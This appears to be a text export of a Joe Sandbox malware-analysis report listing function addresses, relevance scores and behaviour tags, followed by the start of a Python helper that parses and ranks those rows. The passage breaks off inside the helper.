Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00469DF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00445E52 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433DF5 Relevance: 10.6, APIs: 7, Instructions: 69COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436E94 Relevance: 9.1, APIs: 6, Instructions: 75processCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00459EF1 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430E7B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040EF60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00461F53 Relevance: 6.1, APIs: 4, Instructions: 93windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function summaries (the export prints the behaviour label and the COMMON badge fused to the instruction count, e.g. "16threadCOMMON"; they are split out into the Tags column here). The expandable panels under each function (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are collapsed in this export and carry no content.

Function   Relevance  APIs  Strings  Instructions  Tags
0044B5E8   6.0        4     -        37            COMMON
004472F1   6.0        4     -        35            COMMON
00472B63   6.0        4     -        27            COMMON
00472BB2   6.0        4     -        27            COMMON
0041514D   6.0        4     -        16            thread, COMMON
00467215   5.4        2     1        181           share, COMMON
004667E1   5.4        2     1        114           network, COMMON
0044835A   5.3        2     1        99            window, COMMON
00451006   5.3        2     1        75            window, COMMON
00451321   5.3        2     1        73            window, COMMON
00476CA4   5.3        2     1        72            sleep, COMMON
00465225   5.3        2     1        61            network, COMMON
0044256C   5.3        2     1        59            network, COMMON
00469ED9   5.3        1     2        57            window, COMMON
00469F6A   5.3        1     2        54            window, COMMON
004560F2   5.3        2     1        36            window, COMMON
00442651   5.3        2     1        22            network, COMMON
00441BE8   5.3        2     1        17            window, COMMON
00441C20   5.3        2     1        17            window, COMMON
004370C3   5.3        1     2        8             window, COMMON
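Triage helper for the function list above, added here as an example and not part of the Joe Sandbox report or its tooling. It parses the raw text-export form of the summary rows (as in "Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON"), splits the fused tag suffix, and orders functions so that network, thread and sleep code is read before window-handling code. The sample lines are copied from the report's own rows; the rule that an omitted Strings field means zero, and the TAG_PRIORITY ordering, are the analyst's assumptions, not something the report defines.

```python
import re
from dataclasses import dataclass, field

# Raw summary lines as they appear in the text export of the report
# (copied from the function list above, plus two residue lines to show
# that non-function rows are ignored). The behaviour tag and the COMMON
# badge are fused to the instruction count in the export.
SAMPLE_LINES = """\
Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
Function 00469ED9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON
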